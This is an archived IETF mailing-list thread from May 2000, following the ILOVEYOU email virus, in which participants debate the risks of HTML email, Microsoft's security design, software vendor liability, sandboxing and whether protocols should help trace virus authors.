[mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 11:13 AM To: 'Scot Mc Pherson' Cc: '[EMAIL PROTECTED]' Subject: RE: VIRUS WARNING Scot, While what you say is true - meaning an all-text restriction on your email browser will prevent "dangerous goods" to be downloaded - it also takes away functionality. We have to find a way to be able to use html based email but restrict it from - say running scripts, executing anything, writing cookies, issuing queries, etc... Until that happens, you're right - html based email is like a runaway train. We have to invent the "brakes" now. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 10:07 AM To: [EMAIL PROTECTED]; 'Castro, Edison M. (PCA)' Cc: 'Steven M. Bellovin'; [EMAIL PROTECTED]; 'Brant Knudson'; [EMAIL PROTECTED] Subject: RE: VIRUS WARNING I believe the one of the most important holes is html based mail, because the e-mail is processed as a webpage which can be used to download undesirable content. If you configure your e-mail browser to display all messages as text you will close this hole...You will notice my e-mails are nearly 100% text Scot
RE: VIRUS WARNING
At 10.11 -0600 0-05-11, Vernon Schryver wrote: Once you restrict HTML based email enough to be safe, why bother with anything more than text and perhaps simple pictures? What is wrong with that. I use HTML-based e-mail mostly to inluce pictures in my messages. A very useful way of using HTML-based e-mail would also be to send out forms and fill them in via mail, but this does not work so well because some mailers does not handle such messages very good yet. -- Jacob Palme [EMAIL PROTECTED] (Stockholm University and KTH) for more info see URL: http://www.dsv.su.se/jpalme/
RE: VIRUS WARNING
Lillian, Those newsletters that you have spoken of can quite easily be distributed in text format with the standard html tags that are used in text based messages already. Notice my sig has the standard mailto and http tags which can be recognized by the e-mail browser ("Note this is a text message too"), that directs the user to the necessary info if they are inclined without ramming the website down their throat. You are correct in stating that html e-mail does not necessarily and ordinarily does not contain the actual graphical content, but it does "call" the content in question the moment it is opened. This is transmitting an entire webpage through e-mail because in fact a webpage is just the html code which "calls" all the hrefs that exist elsewhere, whether on the local host or not. I certainly agree that html e-mail is also dangerous due to the ability to link the content local to the e-mail readers host. It creates the ability for the sender of an e-mail to gather information that may not be considered sensitive or otherwise plainly undesirable. It also opens the ability to introduce agents and other infectious material to a host that would otherwise require a user's physical acceptance of such material. The necessity to send e-mail in html is NOT. Regardless of whether a list or commerce wishes to advertise through e-mail, there are already avenues for distributing material to demographically selected individuals. Its called the WWW and creating hypertext links in an e-mail to direct a user to desired content is certainly MORE than enough, and also solves part of the congestion problem, because the user must take the time to visit the site in question as opposed the site making a visit to each and every recipient of the message, whether they care about this week's issue of the newsletter or not. The issue here is not about whether it is technologically sound, but whether we are able to market the masses with or without their expressed consent. If a user wishes to visit a commerce's or industry's website they will certainly follow the link provided in the e-mail. It is a different story to simply place the web content directly in front of the user, and this begin to cross the line of harassment and invasion. Its like the difference between receiving an invitation to an open house, and finding out that the open house is coming to YOUR house. Technology doesn't have to contradictory...it is our (ietf) purpose to ensure the internet is used efficiently and in the mass's best interests. This doesn't mean regulation, but it does mean providing proper avenues to get where ever a person wants to go. I will state again, that it isn't our business to prevent access, but it is our business to make sure that people can and do access in the appropriate manner in such a way as to ensure each and every user is satisfied. I mean it would be really silly if you FINGERed a site and got a webpage to display the information. Analogously -html e-mail is a lot like the Microsoft windows is it good for consumers or bad. HTML e-mail like Microsoft windows has made content browsing easier and closer to ubiquitousness, but at the cost of user education. If there is no reason for a user to learn how to use the web or the rest of the net, then why should they??? -Scot Mc Pherson -RF Engineer -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net -Original Message- From: Lillian Komlossy [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 2:29 PM To: 'Scot Mc Pherson' Cc: '[EMAIL PROTECTED]' Subject: RE: VIRUS WARNING Scot, ITA we do not need the HTML email for our everyday use. HTML based email is mainly used by the Email-Newsletter companies, (i.e. Whitehat, Exactis, etc...) especially for advertising purposes. We can argue that we don't need it but in reality, these companies live off the daily newsletters they send out. I believe all of these newsletters are being sent out to people who actually subscribed to receive them. While the reason is mainly commercial it cannot be ignored. As far as the bandwidth is concerned - most of those HTML emails don't actually email the images but rather display it via a link from their own server. (Which of course does not help bandwidth matters especially if first the run it through a logging agent). I believe the problem starts when somebody writes an HTML email that can retrieve, write or execute anything on the receiving client's system. I agree with you - it is contradictory. So is every new technology, even the more tangible ones. I'll bet once everybody agreed that there is no need for the automobile, horses will do fine - but now we want to take our tractor-trailer to work, on an eco-car style gas-burn, and speed as fast as a Ferrari. Go figure. Lillian Komlossy Site Manager http://www.dmnews.com http://www.ima
Re: VIRUS WARNING
On Thu, 11 May 2000 15:04:48 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: The necessity to send e-mail in html is NOT. Regardless of whether a list or commerce wishes to advertise through e-mail, there are already avenues for distributing material to demographically selected individuals. Its called the WWW and creating hypertext links in an e-mail to direct a user to desired content is certainly MORE than enough, and also solves part of the congestion problem, because the user must take the time to visit the site in question as opposed the site making a visit to each and every recipient of the message, whether they care about this week's issue of the newsletter or not. Strictly speaking, part 1: E-mail as a while is not a necessity. The US Postal Service has a 200 year record of delivering large amounts of material in a reasonably cost-effective manner. Strictly speaking, part 2: A case could be made that there should *NOT* be hypertext links in a text/plain segment of an E-mail. RFC2046, section 4.1.3 says pretty specifically: 4.1.3. Plain Subtype The simplest and most important subtype of "text" is "plain". This indicates plain text that does not contain any formatting commands or directives. Plain text is intended to be displayed "as-is", that is, OK? Got that? In other words, it's *PLAIN* text. You want hyperlinks, use text/html or some other type that is defined to support them (Yes, I *know* people violate this all the time. Doesn't mean we should encourage it *more* just because we don't like text/html) -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
Re: VIRUS WARNING
On Thu, May 11, 2000 at 08:36:52PM +0200, Jacob Palme wrote: At 10.11 -0600 0-05-11, Vernon Schryver wrote: Once you restrict HTML based email enough to be safe, why bother with anything more than text and perhaps simple pictures? What is wrong with that. I use HTML-based e-mail mostly to inluce pictures in my messages. Yup... It's real amusing to have your boss looking over your shoulder just about the time a spammer hits your mailer with an html message including IMG SRC= tags embedding some of his porno for you to sample (don't scoff, it has been occuring and has required some people to do some fast talking). Another insiduous trick is to use the refresh tag to bounce you over to his site where he may have other pleasures for you like pop-up windows when you try to close the window. This doesn't work as good since I don't think it's as well supported. But it has been tried and does catch some chumps. Note that the refresh tag is not active content and if you are reading E-Mail in a broswer, it can be real effective and real embarassing. I don't know how effective it is in mere html enabled readers like Outlook or Eudora. As far as tracking down the perpetrators goes... How effective have you been at tracking down the people responsible for spam? A very useful way of using HTML-based e-mail would also be to send out forms and fill them in via mail, but this does not work so well because some mailers does not handle such messages very good yet. -- Jacob Palme [EMAIL PROTECTED] (Stockholm University and KTH) for more info see URL: http://www.dsv.su.se/jpalme/ Mike -- Michael H. Warfield| (770) 985-6132 | [EMAIL PROTECTED] (The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471| possible worlds. A pessimist is sure of it!
RE: VIRUS WARNING
strictly speaking the US postal service is not a form of electric or electronic data communication strictly speaking...my sig IS plain text...it is the browser that recognizes that it could be used as a link Strictly speaking RFC2046, section 4.1.3 says pretty specifically: 4.1.3. Plain Subtype The simplest and most important subtype of "text" is "plain". This indicates plain text that does not contain any formatting commands or directives. Plain text is intended to be displayed "as-is", that is, but it says nothing of e-mail browsers recognizing a string of "plain-text" as an address. -Scot Mc Pherson -RF Engineer -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 3:32 PM To: Scot Mc Pherson Cc: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING On Thu, 11 May 2000 15:04:48 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: The necessity to send e-mail in html is NOT. Regardless of whether a list or commerce wishes to advertise through e-mail, there are already avenues for distributing material to demographically selected individuals. Its called the WWW and creating hypertext links in an e-mail to direct a user to desired content is certainly MORE than enough, and also solves part of the congestion problem, because the user must take the time to visit the site in question as opposed the site making a visit to each and every recipient of the message, whether they care about this week's issue of the newsletter or not. Strictly speaking, part 1: E-mail as a while is not a necessity. The US Postal Service has a 200 year record of delivering large amounts of material in a reasonably cost-effective manner. Strictly speaking, part 2: A case could be made that there should *NOT* be hypertext links in a text/plain segment of an E-mail. RFC2046, section 4.1.3 says pretty specifically: 4.1.3. Plain Subtype The simplest and most important subtype of "text" is "plain". This indicates plain text that does not contain any formatting commands or directives. Plain text is intended to be displayed "as-is", that is, OK? Got that? In other words, it's *PLAIN* text. You want hyperlinks, use text/html or some other type that is defined to support them (Yes, I *know* people violate this all the time. Doesn't mean we should encourage it *more* just because we don't like text/html) -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
Re: VIRUS WARNING
From Steven M. Bellovin's message Thu, 11 May 2000 07:40:26 -0400: } }In message [EMAIL PROTECTED], Einar Stefferud writes: } [snip]... } }Seems to me that this beloved "feature" (giving root privs to random }EMail messages) should (by now) now be fully discredited, and should }be destined for extinction, if only the customers will accept its }disappearance in trade for an absence of a continuing flood of these }$6,000,000,000 economic loss episodes. } }See http://catless.ncl.ac.uk/Risks/5.80.html#subj1 for details on how }it worked -- but it didn't involve any analog to 'root' privileges. } I believe the distintion between USER Privs and ROOT Privs in Windows is almost negligable, in that the typical user opening an attachment in USER space allows major modifications of basic ROOT funtions and data tables, hence in Windows (and probablby other PC environments without multi-user system barriers) ther is very little TOOT protection from USER run processes. And, therein lays the "root" of the problem;-)... This is of course aggravated by attachment of such PCs to the Internet where all end users are responsible for protecting themselves, while their software does not help them to protect themselves. It takes a considerable wizard to do all the complex things that need to be done to close the security holes. But, whay large Fortune 2000 companies put up with all this is a great mystery to me, and of course, intil they get the message here, they will continue to fatten the MS purse while buying such trouble as these problems will cause. To repeat my mantra, it's the customer's fault, cause vendors insist on selling what people will buy;-)... How can any vendor do othersise?? Cheers...\Stef } }When the recipient got a copy, there was an included (or attached; I }don't quite remember) REXX file. (REXX was a scripting language for VM/ }CMS.) The message told you that it would display a Christmas card if }you ran it; most users did just that, since the note appeared to come }from someone they knew. And then the file replicated itself; you all }know the rest. } }Note the two crucial points -- it ran with the user's permissions, and }it was explicitly run by the user, rather than by any automatic }mechanism. } } --Steve Bellovin Cheers...\Stef
Re: VIRUS WARNING
From: John Stracke [EMAIL PROTECTED] --95872F20B70C837D61220742 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Vernon Schryver wrote: What good is HTML based email if it cannot run scripts or even contain links to other HTML content? Well, there's basic formatting: * Simple font variations (italics, bold, color, font) are an easy way to add a bit of expressiveness to your text. o Everybody says that the problem with email is that it's not expressive enough. o To compensate, we've got an elaborate set of conventions for imitating what you can do in print and face-to-face (smileys, *asterisks* for emphasis, etc.). o But new users don't know these conventions. o HTML offers the ability to do the same thing more comprehensibly. Actual smiley faces, italics for emphasis (just like people are used to seeing in print), headings. * And, of course, lists and tables are amazingly useful. All of that can be done in pure ASCII. You don't have to be Shakespear to communicate with the written word without more punctuation than existed in 1960. There was no global plague in 1970 that damage all English speaking brains so that they could no longer communicate without 256 colors of foreground and background, and 1000 typefaces. "Smileys" are particularly lame. No joke is made funny with a smiley nor is any insult prevented. The conventions of bullet lists such as rendered by LI are also mere conventions as opaque to the uninitiated as astrisks or capitalization for emphasis. Most of use are bright enough to not need any explicit initiation to any reasonable convention; even smileys were obvious when there was only 1 kind. And even simple links (never mind forms, applets, etc.) are great for, say, workflow applications. When I worked for Netscape, HR made great use of HTML mail in the internal network. When I wanted to take some vacation time, I filled out a form on the HR site; they would send mail to my manager, with one link to approve and one to deny. Much easier than paper-based systems, or even non-email-based online systems (since the vacation request comes into the inbox you already check, instead of making you go someplace else). Email is not a general purpose hammer. All of those things work far better with various other mechanisms than crammed into email. Email can be a useful part of such systems, but competently designed systems DO NOT do such things purely in email. Worse, when crammed into email, those mechanisms are *INEVITABLE* serious security problems. Email is not only for communications among intimates, such as you and your Human Resources Department. If you let your MUA fully decode HTML every time you read a message, then you are in deep trouble. It's not just the Java and Javascript. Do you really want to tell strangers every time you look at their email because it contains an HREF to a unique URL created just for the purpose? ... --95872F20B70C837D61220742 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit !doctype html public "-//w3c//dtd html 4.0 transitional//en" html Vernon Schryver wrote: blockquote TYPE=CITEWhat good is HTML based email if it cannot run brscripts or even contain links to other HTML content?/blockquote Well, there's basic formatting: ul li Simple font variations (italics, bold, color, font) are an easy way to add a bit of expressiveness to your text./li ul li ... If the point in including an HTML encrypted version of the text in addition to the plantext was to demonstrate the utility of HTML in email, it fell flat. The HTML version conveyed *nothing* to me that the plaintext did not. And yes, I checked by viewing the HTML with Netscape 4.7. ... pre--nbsp; /===\ |John Strackenbsp;nbsp;nbsp; | A HREF="http://www.ecal.com"http://www.ecal.com/A |My opinions are my own. | |Chief Scientist |==| |eCal Corp.nbsp;nbsp;nbsp;nbsp;nbsp; |Whose cruel idea was it for the word "lisp" to| |[EMAIL PROTECTED]|have an "S" in it?nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp; | \===//pre nbsp;/html That's what your signature looks like encrypted with HTML. (I'm hoping my archaic quote leading will keep too-smart-by-half MUA's from collapsing it into reasonableness) Who could prefer it to the plaintext version? /===\ |John Stracke| http://www.ecal.com |My opinions are my own. | |Chief Scientist |==| |eCal Corp. |Whose cruel idea was it for the word "lisp" to| |[EMAIL PROTECTED]|have an "S" in it?
Re: VIRUS WARNING
The pattern is longer than you remember;-)... From Brant's message Sat, 06 May 2000 00:38:29 +: } }I think I'm starting to see a pattern emerging in email viruses. } }Melissa: Uses script to read user's address book to get the email }addresses of new victims. }ILOVEYOU: Uses script to read user's address book to get the email }addresses of new victims. } }What method do you think the next email virus is going to use if }Microsoft doesn't stop scripts from reading people's address books? Why }didn't MS plug this hole after Melissa? } }Brant The first of these "worm/virus/addressbookmailers" was the IBM PROFS "Chrismas Card" caper that occurred some time in the early 1990's, long before MS willfully adopted the design. ((Aside: Do you suppose that MS wants to be like IBM so much that they are making all the same mistakes in the same serial order?)) Seems to me that this beloved "feature" (giving root privs to random EMail messages) should (by now) now be fully discredited, and should be destined for extinction, if only the customers will accept its disappearance in trade for an absence of a continuing flood of these $6,000,000,000 economic loss episodes. This is a perfect proof of a conjecture made by Hasan Azbekan back in the mid 1960's that "The Triumph of Technology is: Can Implies Shall". There is no way to stop this kind of thing repeating and repeating until the easily subverted facility disappears from the Internet. And as long as the customers demand it, it will continue;-)... It is easy to blame the vendors, but they are trapped into selling what the customers demand. So, the fault lies with the customers choices;-)... And, they, led by the Fortune 2000, have rewarded MS handsomely for creating the fertile ground for propagation. For myself, I am contributing to the solution by never ever running any kind of MS mail tool, ever again. You see, I do not blame MS for this. I blame all the users of MS Mail tools for buying into the game, and I am doing all that I can to make sure that I do not pay the price for their disregard for their own safety and security. I am pleased to say that I have not knowingly received a single copy of the "LOVE BUG", even via mailing lists, though I do have to admit to a certain sense of being unloved because of this great lack;-)... Cheers...\Stef
Re: VIRUS WARNING
On Sun, 7 May 2000, Keith Moore wrote: I don't see how, as long as the software manufacturers ship the software with legal disclaimers, e.g. "We are not responsible for damages ..." sooner or later that phrase will be recognized as less valuable than bovine feces. (In the U.S.) It has value, but only in disclaiming rights which are not ordinarily legally present. I cannot escape liability for causing an auto accident by putting such a label on my car, but such a label can provide evidence that a customer could not have reasonably believed that a company was not assuming liability which would not ordinarily have been legally assigned to it - for instance, if MS was not negligent in any fashion, but Windows still manages to make my computer disintegrate, I would have difficulty establishing that MS should pay for my computer because of implied promises in their advertising. Even in the stronger case where the license agreement states "by agreeing to the terms of this license, the user agrees not to hold MS liable for any damage caused by this product," this is generally worthless if MS is negligent - you cannot waive rights to recourse for "any and all damage which might potentially occer." -=I would imagine that if 1000 Rwandan's were hacked to death AT THE EXPO, people would sure have raised a stink.=-
RE: VIRUS WARNING
Sorry Lillian, Forgot to add the smiley !!! Did not intend to upset anybody I actually use both systems, but prefer Unix ;- Jim -Original Message- From: Lillian Komlossy [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 2:28 PM To: Jim Dunn Cc: '[EMAIL PROTECTED]' Subject: RE: VIRUS WARNING Let's not make it political. We've all been attacked, it is pointless to bring in the Unix vs Windows debate. Office, Windows, Unix, Linux, Mac are all great as long as somebody likes to work with them. I personally like Microsoft products, but I respect those who don't - and expect the same respect from them. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Jim Stephenson-Dunn [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 4:18 PM To: 'A James Lewis'; 'Lillian Komlossy' Cc: [EMAIL PROTECTED] Subject: RE: VIRUS WARNING Office for Unix, Now there's a terrifying thought (please don't contaminate the purity of my unix system with that filthy windows software) Jim Jim Dunn Senior Network Engineer San Francisco NOC -Original Message- From: A James Lewis [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 11:53 AM To: Lillian Komlossy Cc: '[EMAIL PROTECTED]' Subject: RE: VIRUS WARNING The whole world will use what they are presented with the difference between Win3.1 and Win95 is far greater than the difference between Win95 and GNOME or KDE... so actually it's only software availability thats holding back IS departments the world over! If MS gets split, we could have Office for UNIX sooner rather than later too! On Thu, 4 May 2000, Lillian Komlossy wrote: Donald, The whole world will not switch over to Unix - the average user will always be more confortable with Windows unless Unix will at one point offer the same seamless user-friendliness. So it will always be a problem, one which cannot be solved by telling others not to use what they've accustomed to - and one which cannot be ignored. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 10:48 AM To: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embdedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develope a list of subject lines you are freightened of. Donald From: "Scot Mc Pherson" [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 4 May 2000 09:27:19 -0400 Message-ID: 00cf01bfb5cc$79bc4280$[EMAIL PROTECTED] Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit X-Loop: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net A. James Lewis ([EMAIL PROTECTED]) Don't throw your computers out of the windows, throw the Windows(tm) out of your computers.
RE: VIRUS WARNING
It should be pretty obvious that the only reason that viruses are so prolific on MS platforms, is that so many people are using them. When designing a virus to spread, the user base must be considered. A virus written to infect UNIX systems would not attract much attention anywhere other than a small circle of professionals and engineers. Michael B. Bellopede [EMAIL PROTECTED] -Original Message- From: Randall Stewart [mailto:[EMAIL PROTECTED]] Sent: Friday, May 05, 2000 8:05 PM To: Michael H. Warfield Cc: [EMAIL PROTECTED]; Scot Mc Pherson; [EMAIL PROTECTED] Subject: Re: VIRUS WARNING Michael: I could not agree more, we have a few (possibly .. 3) virus that have infect *nix systems. Even more telling, look at how linux systems have NOT been infected or bothered much. I find this interesting since the code - bugs, wart, and any holes are available to any who want to look at it... Now if I take and switch the machine I am typing on over to that "other" o/s the virus scanner it has lists 100's and I mean 100's of viruses... I do understand that some of us are STUCK with that other O/S... but there are options.. I too am in theory using it.. but only when I have to... I do all my real work on the linux side and only occasionaly fire up the other side to read a awful .doc or .ppt file... I simply refuse to allow our IT dept to have there way with me and infect me with the worst virus... that other O/S :-) R "Michael H. Warfield" wrote: On Thu, May 04, 2000 at 11:13:03PM -0400, [EMAIL PROTECTED] wrote: On Thu, 04 May 2000 11:11:50 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: In fact to back up your statement, there are exactly 3 virii that infect UNIX based systems. Hmm.. the Morris worm of 1988. What are the other 2? Bliss? Wasn't very sophisticated and it didn't propagate very well, but it did work. It just fizzeled out because it's propagation coefficient never even came close to break even. What's the other one? Hmm.. if you count the 2 self-reproducing sample programs that came with 'gcc', no others. Or maybe there's more than 3, which is likely since I've seen at least 4 different "proof of concept" level creations... I've seen some assembly code someone was proposing on one of the development lists. One of the DOS virus writers claiming that it would work as a Linux virus. No evidence that it does anything though. I would marginally call that one a "proof of concept" or a "maybe of concept". Valdis Kletnieks Operating Systems Analyst Virginia Tech Mike -- Michael H. Warfield| (770) 985-6132 | [EMAIL PROTECTED] (The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471| possible worlds. A pessimist is sure of it! -- Randall R. Stewart Member Technical Staff Network Architecture and Technology (NAT) 847-632-7438 fax:847-632-6733
RE: VIRUS WARNING
From: "Michael B. Bellopede" [EMAIL PROTECTED] Subject: RE: VIRUS WARNING Date: Mon, 8 May 2000 09:27:14 -0400 It should be pretty obvious that the only reason that viruses are so prolific on MS platforms, is that so many people are using them Hardly. Compare the apparent security considerations in the design of Microsoft Outlook and Word (execute pretty much anything with few limitations on the effects the executing code can have on the hosting system) with those of Java and the Java virtual machine (provide a sandbox in which the code executes and provide mechanisms (e.g., the SecurityManager) that control the effects of the code executing in the sandbox can have on the broader environment). It should be pretty obvious that security is a greater design consideration for some systems than for others. -tjs
Re: VIRUS WARNING
At 11.07 -0800 0-05-07, [EMAIL PROTECTED] wrote: Well, I was there, and I question the validity of your assessment of what was going on. While it is true that there was a clear concensus opposed to adding wiretapping facilities in the RAVEN sense, it was by no means 95-98 percent. Perhaps I misunderstood the question being asked at the meeting. I understood the question to be if we wanted to develop protocols to help police trace net villains, you understood it to be more restricted in only helping police perform viretapping. At 21.39 -0700 0-05-07, James P. Salsman wrote: I fully agree and have decided to sponsor a contest to correct the situation. I will give one share of Microsoft stock to the first person who posts, to this IETF Discussion list, a draft shareholder resolution that would, in the opinion of Keith Moore or his designated alternate, correct the situation if it were adopted by Microsoft Corporation as we currently know it. Certainly, Microsoft software could be designed to make it more difficult for virus spreading. However, the villains will learn to get around such features. Compare with spammers. A few years ago, you could easily detect spamming by checking if a message did not come from a mailing list you subscribed to, and did not have your name in any of the recipient field. Today, more and more spam messages even contain your name in the text in some kind of greeting "Hella Jacob", which obviously was put there to confound spam checkers who detect spam by checking if many identical messages are sent. At 06.38 -0400 0-05-08, Garreth Jeremiah wrote: The "Java" sandbox idea in my mind is a great one. My experience is that almost ever where I wanted to do something useful with applets, what I wanted to do was forbidden by security restrictions. At 15.05 +0200 0-05-08, Magnus Danielson wrote: What you really would like to have is a common accept/deny type of list. This would trim down the required OK's quite alot. Those which are on the deny list would be silently denied and those on the accept list would be silently accepted. Only those not existing on either of the lists would actually require manual intervention in approving. This will only work if the identity of the allowed senders was identified with crypthographic methods. Otherwise, the virus senders will find ways to make believe being the people you trust. --- Methods helping the police track virus makers: (1) Making software more restrictive in accepting foreign code. Comment: Will help, unless the virus producers learn to circumwent it. Hass the risk of making life for ordinary legal users more difficult. (2) Improve (1) with strong crypthographic methods to identify trusted senders. Comment: A promising method, if only strong crypthographic methods get commonly used. Note however, those of you who want to protect anonymity: Strong crypthographic methods are methods to identify people securely, not methods to allow people to be anonymous. (3) Tracing and logging feature to find out where the virus came from. Comment: Virus makers will certainly try to cheat such systems by incorrect identification such as senders IP address. But I still believe this is one of the most promising methods. (4) Sandbox environments for executing possibly dangerous code. Comment: Every good programming language should be designed as a "virtual machine" where a program, when executed, cannot do anything outside of this protected environment. I wrote this already in a paper published in Datamation, December 1975, pp 77-80, with the title "Languages for Reliable Software". However, the safest sandboxes are also those most restrictive against doing legal things well. (5) Create anti-bodies which scan incoming data and detect known viruses. This is the main methods of the anti- virus software sold today. It is, however, becoming more difficult since the number of viruses is getting so large that the anti-body creators have problems keeping up with it. I do not think this is an either/or situation. To stop the proliferation of viruses, we should do all of this. And IETF can certainly help, by designing methods to support all of these anti-virus activities. I do not think we can ever stop people from producing viruses. If, however, we make the risk of getting caught large enough, most of them will find other methods of venting their anger at society, like stealing hubcaps or crashing windows. There is an obvious conflict between anonymity, privacy, and detecting criminal behaviour. Different people position themselves at different places on this scale, but you cannot deny that the conflict exists. Crime is much more common in urban than rural areas - just because people are easier anonymous in the urban areas. -- Jacob Palme [EMAIL PROTECTED] (Stockholm University and KTH) for more info see URL:
Re: VIRUS WARNING
At 20.39 -0400 0-05-04, Keith Moore wrote: but sooner or later folks are going to be held liable for poor engineering or poor implementation of networking software, just like folks today can be held liable for poor engineering or implementation of bridges or buildings. This discussion is highly relevant to the IETF list, if we discuss the problems and how to overcome them, and avoid the never-ending platform war discussions. At the IETF meeting in December 1999, the issue was discussed whether IETF should support changes in protocols which would make it easier to find villains committing crime on the net. This was discussed in a large plenary meeting, with about a thousand people present. A very large majority, something like 95 or 98 percent of those present, voted against this. I was one of the few who voted yes. All of you who voted against designing Internet protocols so as to help police finding the villain of criminal net-behavour: Have you not changed your mind? Should we not try to find and prosecute the people distributing viruses? Should we not redesign the Internet, so that this becomes easier, for example by doing more logging in the routers, so that you can go back and check from where something illegal came. Or do you mean that this is impossible, because the villains will just get more clever and learn to cheat such procedures? -- Jacob Palme [EMAIL PROTECTED] (Stockholm University and KTH) for more info see URL: http://www.dsv.su.se/jpalme/
Re: VIRUS WARNING
Jacob, in my mind the people most responsible for the viruses are those who built systems that were so easily compromised. we don't need protocol support to track them down. Keith
Re: VIRUS WARNING
--On Sunday, 07 May, 2000 11:17 -0400 Keith Moore [EMAIL PROTECTED] wrote: in my mind the people most responsible for the viruses are those who built systems that were so easily compromised. we don't need protocol support to track them down. Keith, This is a difficult issue and, IMO, a slippery slope. I want to agree with you, I really do, partially because I believe that it is a really bad idea for organizations to ship software with all security controls off by default, especially if there is no really easy way to enable those controls, and that companies that do so should take responsibility for the consequences. However, in the more general case, if one takes the position that, if I build a dangerous-but-useful tool and someone misuses it, I should be held responsible, we are going to end up with rules against a lot of very useful stuff including, in extreme cases, many open source environments. While this situation has not changed my feelings about the Raven outcome any more than it has yours, this is probably not a good situation about which to get simplistic. john
Re: VIRUS WARNING
Keith Moore [EMAIL PROTECTED] wrote: but sooner or later folks are going to be held liable for poor engineering or poor implementation of networking software, just like folks today can be held liable for poor engineering or implementation of bridges or buildings. I don't see how, as long as the software manufacturers ship the software with legal disclaimers, e.g. "We are not responsible for damages ..." Also, bridges and buildings are built by licensed professionals, for the most part. Comparatively speaking, very few software professionals are licensed in this way. They do accept responsibility for damages; said responsibility is factored into the cost of the bridge or building. [Generalization] Much software is cheap and sold in bulk as a commodity. If for some reason software became significantly more expensive that would limit its spread and growth. We would no longer have the thriving industry we have now. --gregbo
Re: VIRUS WARNING
Date: Sun, 7 May 2000 17:55:19 +0200 To: IETF general mailing list [EMAIL PROTECTED] From: Jacob Palme [EMAIL PROTECTED] Subject: Re: VIRUS WARNING [...] I have set my MS Office programs to always ask me before running a macro in an unkown file in it. The advantage is less risk for viruses, but the disadvantage is that I have to OK those questions from MS Office of whether to accept macros. And if they occur too open, there is a risk that I click "yes" before thinking through the risk of doing this. [...] Other disadvantages include: o You have very little basis upon which to make a decision. You can decide based upon whether you trust the sender (which isn't much to go on, as shown by the recent batch of Outlook viruses), but you can't decide based on whether the macro might damage your system. o Once you click "yes", there is apparently little limit to the damage that the macro can do, (if it isn't executing in a well- constructed sandbox). -tjs
Re: VIRUS WARNING
but sooner or later folks are going to be held liable for poor engineering or poor implementation of networking software, just like folks today can be held liable for poor engineering or implementation of bridges or buildings. This discussion is highly relevant to the IETF list, if we discuss the problems and how to overcome them, and avoid the never-ending platform war discussions. At the IETF meeting in December 1999, the issue was discussed whether IETF should support changes in protocols which would make it easier to find villains committing crime on the net. This was discussed in a large plenary meeting, with about a thousand people present. A very large majority, something like 95 or 98 percent of those present, voted against this. I was one of the few who voted yes. Well, I was there, and I question the validity of your assessment of what was going on. While it is true that there was a clear concensus opposed to adding wiretapping facilities in the RAVEN sense, it was by no means 95-98 percent. And even more important, this wasn't a vote about mechanisms that would make it easier to find people who distribute viruses. Wiretapping has little if anything to do with tracking down people who distribute virusus. All of you who voted against designing Internet protocols so as to help police finding the villain of criminal net-behavour: Have you not changed your mind? On wiretapping, no I haven't. Nor have I changed my mind about viruss. But again, one of these has almost nothing to do with the other. The scope of the question asked was very narrowly drawn. You're reading a lot more into the question that was there. Should we not try to find and prosecute the people distributing viruses? Of course we should. But again, this is a matter of having a useful security infrastructure on the net, not wiretapping. I suspect that if you asked the same group of people who voted against wiretapping how they felt about security infrastructure you'd get a _very_ different response. Should we not redesign the Internet, so that this becomes easier, for example by doing more logging in the routers, so that you can go back and check from where something illegal came. And once again you're switching topics. The issue of tracing traffic is quite different from wiretapping and quite different from having the tools to track virus distribution end to end. These are three separate matters. Or do you mean that this is impossible, because the villains will just get more clever and learn to 